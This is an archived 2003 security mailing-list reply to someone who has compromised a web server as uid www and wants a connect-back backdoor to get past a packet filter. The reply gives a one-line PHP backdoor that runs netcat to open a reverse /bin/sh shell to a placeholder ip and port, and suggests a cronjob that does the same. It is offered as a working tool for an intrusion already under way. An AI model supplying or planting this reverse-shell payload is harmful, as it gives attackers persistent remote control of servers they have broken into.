Re: perl/php connect-back backdoor?

From: Knud Erik Højgaard (kainat_private)
Date: Mon Jul 28 2003 - 13:24:47 PDT

Next message: wirepair: "Re: is it even possible for a worm with dcom vuln?"

Previous message: Justin Pryzby: "Re: Password Cracking Challenge..."
In reply to: Ingram: "perl/php connect-back backdoor?"
Next in thread: Diode Trnasistor: "Re: perl/php connect-back backdoor?"
Reply: Diode Trnasistor: "Re: perl/php connect-back backdoor?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Ingram wrote:
[snip]
> i got right know is uid www. I think a connect-back perl/php code
> could made it through this packtfilter, as the outbound rules could
> be less tight. 
> 
> Anyone aware of a backdoor like this?
netcat:
<? passthru("nc -e /bin/sh ip port"); ?>

or a cronjob doing the same.. 

--
kokanin

Next message: wirepair: "Re: is it even possible for a worm with dcom vuln?"
Previous message: Justin Pryzby: "Re: Password Cracking Challenge..."
In reply to: Ingram: "perl/php connect-back backdoor?"
Next in thread: Diode Trnasistor: "Re: perl/php connect-back backdoor?"
Reply: Diode Trnasistor: "Re: perl/php connect-back backdoor?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Jul 28 2003 - 13:43:43 PDT